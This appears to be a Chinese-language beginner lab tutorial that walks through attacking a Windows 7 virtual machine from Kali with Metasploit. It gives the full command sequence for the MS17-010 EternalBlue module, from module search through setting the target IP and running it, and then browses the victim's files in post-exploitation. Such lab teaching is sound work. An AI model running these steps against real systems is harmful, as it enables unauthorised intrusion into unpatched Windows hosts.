一、背景介紹

Metasploit就是一個漏洞框架。它的全稱叫做The Metasploit Framework，簡稱叫做MSF。Metasploit作為全球最受歡迎的工具，不僅僅是因為它的方便性和強大性，更重要的是它的框架。它允許使用者開發自己的漏洞腳本，從而進行測試。Metasploit(msf)究竟威力如何呢？如何利用木馬控制受害者主機呢？接下來讓我們一起學習！

二、資源裝備

1.安裝好 Win7的虛擬機一臺

2.整裝待發的小白一個。

3.安裝好的Kali Linux虛擬機一臺。

三、攻防實戰

3.1 利用Metasploit（msf）滲透框架對目標主機進行攻擊，如下圖所示。

步驟1：啟動Metasploit（msf）滲透框架，如下圖所示。

命令：msfconsole

步驟2：Metasploit（msf）滲透框架啟動成功，如下圖所示。

步驟3：檢索漏洞，如下圖所示。

命令：search 漏洞編號

例子：search ms17-010

步驟4：檢索到有關漏洞的利用模塊如下圖所示。

步驟5：選擇對應的漏洞利用模塊并使用，如下圖所示。

命令：use 漏洞利用模塊名稱

例子：use
exploit/windows/smb/ms17_010_eternalblue

步驟6：查看使用的漏洞模塊需要設置的參數，如下圖所示。。

命令：show option

步驟7：設置攻擊參數，如下圖所示。

命令：set rhosts 受害者主機IP

例子：set rhosts 192.168.78.160

步驟8：查看對應的參數是否設置成功，如下圖所示。

命令：show options

步驟9：運行漏洞利用模塊，如下圖所示。

命令：run

步驟10：如下圖所示，成功拿下目標主機

提示：ETERNALBLUE overwrite completed successfully!

3.2 進入后滲透階段，利用DOS命令控制目標主機，如下圖所示。

步驟1：進入Windows系統的cmd窗口，如下圖所示。

步驟2：利用命令查看受害者主機的文件夾信息，如下圖所示。

命令：dir

切換文件夾目錄：cd 文件夾名

切換盤符：cd 盤符名